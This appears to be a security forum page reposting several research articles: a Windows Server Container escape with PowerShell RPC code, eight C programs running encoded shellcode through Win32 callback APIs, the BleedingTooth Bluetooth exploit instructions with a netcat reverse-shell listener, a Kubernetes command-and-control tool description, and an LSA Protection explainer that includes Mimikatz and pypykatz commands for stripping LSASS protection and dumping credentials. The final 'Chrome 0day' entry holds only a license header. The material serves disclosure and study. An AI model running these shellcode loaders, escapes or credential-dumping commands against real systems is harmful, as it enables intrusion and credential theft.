#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {
#    "\\.\GLOBALROOT" + $f.FullPath
#}
PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path
PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'
PS> $client = Get-RpcClient $rpc
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> Connect-RpcClient $client -EndpointPath ntsvcs
PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `
    [NullString]::Value, `
    [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)
PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `
    [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `
    [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)
PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected that you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container, the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned, the MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary. I decided to report the registry symbolic link issue immediately, as I could argue that it was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows; it just required a special environment to function. This was issue 2120, which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward: the call to PsIsCurrentThreadInServerSilo was removed, as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design.
I couldn’t find any official Microsoft or Docker documentation describing the behavior, so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated, as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Containers for anything where untrusted code could ever run.

After much back and forth with various people in MSRC, a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible, as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here.
While I managed to get four issues fixed, I doubt they're the only ones which could be discovered and exploited. Ideally, you should never run untrusted workloads in a Windows Server Container, and it probably shouldn't expose remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interaction with the rest of the world.

The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here. Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle, and Hyper-V is at least a supported security boundary. However, container escapes are still useful, as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

Sursa: https://googleprojectzero.blogspot.com/2021/04/who-contains-containers.html
12. Executing Shellcode via Callbacks

What is a Callback Function?

In simple terms, it's a function that is called through a function pointer. When we pass a function pointer to a parameter where a callback function is required, and that pointer is later used to call the function it points to, a callback is said to be made. This can be abused to pass shellcode instead of a legitimate function pointer. The technique has been around for a long time, and there are many Win32 APIs we can use to execute shellcode this way. This article contains a few APIs that I have tested and that work on Windows 10.

Analyzing an API

For example, let's take the function EnumWindows from user32.dll. The first parameter lpEnumFunc is a pointer to a callback function of type WNDENUMPROC.

BOOL EnumWindows(
  WNDENUMPROC lpEnumFunc,
  LPARAM      lParam
);

The function passes the parameters to an internal function called EnumWindowsWorker. The first parameter, which is the callback function pointer, is called inside this function, making it possible to pass position-independent shellcode. By checking the references, we can see that other APIs use the EnumWindowsWorker function, making them suitable candidates for executing shellcode. 
EnumFonts

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    EnumFonts(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode, 0);
}

EnumFontFamilies

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    EnumFontFamilies(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode, 0);
}

EnumFontFamiliesEx

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    EnumFontFamiliesEx(GetDC(0), 0, (FONTENUMPROC)(char *)shellcode, 0, 0);
}

EnumDisplayMonitors

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    EnumDisplayMonitors((HDC)0, (LPCRECT)0, (MONITORENUMPROC)(char *)shellcode, (LPARAM)0);
}

LineDDA

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    LineDDA(10, 11, 12, 14, (LINEDDAPROC)(char *)shellcode, 0);
}

GrayString

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    GrayString(0, 0, (GRAYSTRINGPROC)(char *)shellcode, 1, 2, 3, 4, 5, 6);
}

CallWindowProc

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    CallWindowProc((WNDPROC)(char *)shellcode, (HWND)0, 0, 0, 0);
}

EnumResourceTypes

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
    int shellcode[] = {
        015024551061, 014333060543, 012124454524, 06034505544,
        021303073213, 021353206166, 03037505460, 021317057613,
        021336017534, 0110017564, 03725105776, 05455607444,
        025520441027, 012701636201, 016521267151, 03735105760,
        0377400434, 032777727074
    };
    DWORD oldProtect = 0;
    BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
    EnumResourceTypes(0, (ENUMRESTYPEPROC)(char *)shellcode, 0);
}

You can check this repo by my friends @bofheaded & @0xhex21 for other callback APIs.

Sursa: https://osandamalith.com/2021/04/01/executing-shellcode-via-callbacks/
13. BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.

Technical details

Technical details about the exploit are available at writeup.md.

Usage

Compile it using:

$ gcc -o exploit exploit.c -lbluetooth

and execute it as:

$ sudo ./exploit target_mac source_ip source_port

In another terminal, run:

$ nc -lvp 1337
exec bash -i 2>&0 1>&0

If successful, a calc can be spawned with:

export XAUTHORITY=/run/user/1000/gdm/Xauthority
export DISPLAY=:0
gnome-calculator

This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:

5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

The success rate of the exploit is estimated at 80%.

Credits

Andy Nguyen (theflow@)

Sursa: https://google.github.io/security-research/pocs/linux/bleedingtooth/
14. Kubesploit

Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent dedicated to containerized environments, written in Golang and built on top of the Merlin project by Russel Van Tuyl (@Ne0nd0g).

Our Motivation

While researching Docker and Kubernetes, we noticed that most of the tools available today are aimed at passive scanning for vulnerabilities in the cluster, and there is a lack of more complex attack vector coverage. They might allow you to see the problem but not exploit it. It is important to run the exploit to simulate a real-world attack that will be used to determine corporate resilience across the network. When running an exploit, it will exercise the organization's cyber event management, which doesn't happen when scanning for cluster issues. It can help the organization learn how to operate when real attacks happen, see whether its other detection systems work as expected and what changes should be made. We wanted to create an offensive tool that meets these requirements.

But we had another reason to create such a tool. We already had two open-source tools (KubiScan and kubeletctl) related to Kubernetes, and we had ideas for more. Instead of creating a project for each one, we thought it would be better to make a new tool that would centralize the new tools, and this is when Kubesploit was created. We searched for an open-source project that provides the heavy lifting for a cross-platform system, and we found Merlin, written by Russel Van Tuyl (@Ne0nd0g), to be suitable for us.

Our main goal is to contribute to raising awareness about the security of containerized environments, and to improve the mitigations implemented in the various networks. All of this is captured through a framework that provides the appropriate tools for the job of PT teams and Red Teamers during their activities in these environments. Using these tools will help you estimate these environments' strengths and make the required changes to protect them. 
What's New

As the C&C and the agent infrastructure were already done by Merlin, we integrated a Go interpreter ("Yaegi") to be able to run Golang code from the server on the agent. It allowed us to write our modules in Golang, provide more flexibility on the modules, and dynamically load new modules. It is an ongoing project, and we are planning to add more modules related to Docker and Kubernetes in the future. The currently available modules are:

- Container breakout using mounting
- Container breakout using docker.sock
- Container breakout using CVE-2019-5736 exploit
- Scan for Kubernetes cluster known CVEs
- Port scanning with focus on Kubernetes services
- Kubernetes service scan from within the container
- Light kubeletctl containing the following options:
  - Scan for containers with RCE
  - Scan for Pods and containers
  - Scan for tokens from all available containers
  - Run command with multiple options

Quick Start

We created a dedicated Kubernetes environment in Katacoda for you to experiment with Kubesploit. It's a full simulation with a complete set of automated instructions on how to use Kubesploit. We encourage you to explore it.

Build

To build this project, run the make command from the root folder.

Quick Build

To run a quick build for Linux, you can run the following:

export PATH=$PATH:/usr/local/go/bin
go build -o agent cmd/merlinagent/main.go
go build -o server cmd/merlinserver/main.go

Mitigations

YARA rules

We created YARA rules that will help to catch Kubesploit binaries. The rules are written in the file kubesploit.yara.

Agent Recording

Every Go module loaded to the agent is recorded inside the victim machine.

MITRE map

We created a MITRE map of the attack vectors used by Kubesploit.

Mitigation for Modules

For every module we created, we wrote its description and how to defend from it. We summed it up in the MITIGATION.md file.

Contributing

We welcome contributions of all kinds to this repository. 
For instructions on how to get started and descriptions of our development workflows, please see our contributing guide.

Credit

We want to thank Russel Van Tuyl (@Ne0nd0g) for creating Merlin as an open-source project that allowed us to build Kubesploit on top of it. We also want to thank Traefik Labs (@traefik) for creating the Go interpreter ("Yaegi") that allowed us to easily run the Golang modules on a remote agent.

License

Copyright (c) 2021 CyberArk Software Ltd. All rights reserved. This repository is licensed under the GPL-3.0 License. For the full license text see LICENSE.

Share Your Thoughts And Feedback

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) from CyberArk Labs or open an issue. You can find more projects developed by us at https://github.com/cyberark/.

Sursa: https://github.com/cyberark/kubesploit
15. We will be tracing the execution flow of the fopen C function through User-Mode down to ntdll.dll!NtCreateFile, where the User-Mode part ends. Sample fopen.exe to download available here: https://github.com/Dump-GUY/Malware-a...
16. Do You Really Know About LSA Protection (RunAsPPL)?

April 07, 2021

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days.

Introduction

When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure, as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected. Therefore, as a security consultant, this is one of the top recommendations I usually give to a client.

However, from a client's perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think this confusion comes from the fact that the latter seems to provide a more robust mechanism, although Credential Guard and LSA Protection are actually complementary. But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such an explanation so, without going into too much detail, I think I said something like this about LSA Protection: "only a digitally signed binary can access a protected process". You probably noticed that this sentence does not make much sense. This is how I realized that I didn't really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, hence why I wanted to write about it. 
Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather to gather the information which I think is the most valuable from a security consultant's perspective.

How to Enable LSA Protection (RunAsPPL)

As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before. If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to:

- open the Registry Editor (regedit.exe) as an Administrator;
- open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa;
- add the DWORD value RunAsPPL and set it to 1;
- reboot.

That's it! You are done!

Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is "yes", then you need to take some precautions.

- Do you use any third-party authentication module?
- Do you use UEFI and/or Secure Boot?

Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that it meets the requirements that are listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). 
The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such a module would be blocked if RunAsPPL were enabled.

Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection.

You Shall Not Pass!

By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite for example. An output such as the one below should therefore look familiar. This screenshot shows several important things:

- the current user is a member of the default Administrators group;
- the current user has SeDebugPrivilege (although it is currently disabled);
- the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege;
- the command sekurlsa::logonpasswords failed with the error code 0x00000005.

So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in. 
HANDLE hData = NULL;
DWORD pid;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;

kull_m_process_getProcessIdForName(L"lsass.exe", &pid);
hData = OpenProcess(processRights, FALSE, pid);
if (hData && hData != INVALID_HANDLE_VALUE) {
    // if OpenProcess OK
} else {
    PRINT_ERROR_AUTO(L"Handle on memory");
}

In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function which failed along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499).

Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then it tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see on the previous screenshot is that this function failed with the error code 0x00000005, which simply means "Access is denied". This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags.

All the things I have explained so far can be considered common knowledge, as they have been discussed in many other blog posts or pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts.

Bypassing RunAsPPL with Currently Known Techniques

At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short. 
Technique 1 – The Revenge of the Kiwi

In the previous part, I stated that RunAsPPL effectively prevented Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it. To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe.

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Once you are done, you can even "restore" the protection using the same command, but without the /remove argument, and finally unload the driver with !-.

mimikatz # !processprotect /process:lsass.exe
mimikatz # !-

There is one thing to be aware of if you do that though! You have to know that Mimikatz does not restore the protection level to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light, whereas it is PsProtectedSignerWinTcb after the protection was restored by Mimikatz. In a way, this renders the system even more secure than it was, as you will see in the next part, but it could also have some undesired side effects.

Technique 2 – Bring Your Own Driver

The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in memory for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this will also break the digital signature of the file. 
So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do. If you don't want to go through the official signing process, there is a clever trick you can use. This trick consists of loading an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded, it can be exploited from User-land to load an unsigned driver, for example. This technique is implemented in gdrv-loader and PPLKiller for instance.

Technique 3 – Python & Katz

The last two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the Process protection. Such a technique is still very dangerous: make one mistake and you trigger a BSOD.

More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV detection/blocking of access to the LSASS process. If you want to access LSASS' memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Therefore, some AV software may block such an attempt, thus effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: simply do not invoke OpenProcess. But how do you get the initial handle then?

The answer came from the following observation: sometimes, other processes, such as in the case of Antivirus software, already have an opened handle on the LSASS process in their memory space. So, as an administrator with debug privileges, you could copy this handle into your own process and then use it to access LSASS.

It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL, because some unprotected processes may have obtained a handle on the LSASS process by another means, using a driver for instance. In which case, you can use pypykatz with the following command. 
pypykatz live lsa --method handledup

On some occasions, this method worked perfectly fine for me, but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine.

What are PPL Processes?

Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the things that are commonly known first, so I can explain them in more detail here.

A Long Time Ago in a Galaxy Far, Far Away…

OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning.

First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008, and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the "Protected Processes" part of Windows Internals).

In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly sensitive processes.

A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light. 
PPL is actually an extension of the previous Protected Process model and adds the concept of a "Protection level", which basically means that some PP(L) processes can be more protected than others.

Protection Levels

The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here.

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1; // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection.

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone           = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected      = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,     // 0
    PsProtectedSignerAuthenticode, // 1
    PsProtectedSignerCodeGen,      // 2
    PsProtectedSignerAntimalware,  // 3
    PsProtectedSignerLsa,          // 4
    PsProtectedSignerWindows,      // 5
    PsProtectedSignerWinTcb,       // 6
    PsProtectedSignerWinSystem,    // 7
    PsProtectedSignerApp,          // 8
    PsProtectedSignerMax           // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

As you probably guessed, a process' protection level is defined by a combination of these two values. The below table lists the most common combinations. 
Protection level                  Value  Signer            Type
PS_PROTECTED_SYSTEM               0x72   WinSystem (7)     Protected (2)
PS_PROTECTED_WINTCB               0x62   WinTcb (6)        Protected (2)
PS_PROTECTED_WINDOWS              0x52   Windows (5)       Protected (2)
PS_PROTECTED_AUTHENTICODE         0x12   Authenticode (1)  Protected (2)
PS_PROTECTED_WINTCB_LIGHT         0x61   WinTcb (6)        Protected Light (1)
PS_PROTECTED_WINDOWS_LIGHT        0x51   Windows (5)       Protected Light (1)
PS_PROTECTED_LSA_LIGHT            0x41   Lsa (4)           Protected Light (1)
PS_PROTECTED_ANTIMALWARE_LIGHT    0x31   Antimalware (3)   Protected Light (1)
PS_PROTECTED_AUTHENTICODE_LIGHT   0x11   Authenticode (1)  Protected Light (1)

Signer Types

In the early days of Protected Processes, the protection level was binary: either a process was protected or it was not. We saw that this changed when PPLs were introduced with Windows NT 6.3. Both PP and PPL now have a protection level which is determined by a signer level as described previously. Therefore, another interesting thing to know is how the signer type and the protection level are determined.

The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file's digital certificate: Enhanced Key Usage (EKU). On this screenshot, you can see two examples: wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level.

Protection Precedence

The last key aspect that needs to be discussed is the Protection Precedence. 
In the "Protected Process Light (PPL)" part of Windows Internals 7th Edition Part 1, you can read the following:

When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa.

In other words:

- a PP can open a PP or a PPL with full access, as long as its signer level is greater or equal;
- a PPL can open another PPL with full access, as long as its signer level is greater or equal;
- a PPL cannot open a PP with full access, regardless of its signer level.

Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you super powers. If you are running a protected process as a low-privileged user, you will not be able to magically access other users' processes. It's an additional protection.

To illustrate this, I picked 3 easily identifiable processes / image files:

- wininit.exe – Session 0 initialization
- lsass.exe – LSASS process
- MsMpEng.exe – Windows Defender service

Pr.  Process      Type             Signer       Level
1    wininit.exe  Protected Light  WinTcb       PsProtectedSignerWinTcb-Light
2    lsass.exe    Protected Light  Lsa          PsProtectedSignerLsa-Light
3    MsMpEng.exe  Protected Light  Antimalware  PsProtectedSignerAntimalware-Light

These 3 PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege, so user rights are not a concern in this example. This all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it could access the two other processes. Then, lsass.exe could access MsMpEng.exe, as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe can access neither of the two other processes because it has the lowest level.

Conclusion

In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes. 
This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want and you could well completely disable the protection of any Protected Process. Of course, this has become a bit more complicated over the years as you are now required to load a digitally signed driver, but this restriction can be worked around as we saw. In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that “LSASS” has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g.: “WININIT”), would still be able to open it with full access. There is one aspect of PP/PPL that I did not mention though. The “L” in “PPL” is here for a reason. Indeed, with the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks. Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I’ll keep you posted on Twitter. The best is yet to come, so stay tuned! 
Links & Resources

Microsoft - How to configure additional LSA protection of credentials
https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection

Windows Internals 7th edition (Part 1)
https://docs.microsoft.com/en-us/sysinternals/resources/windows-internals

Sursa: https://itm4n.github.io/lsass-runasppl/
  17. Nytro

    Chrome 0day

/*
BSD 2-Clause License

Copyright (c) 2021, rajvardhan agarwal
All rights reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

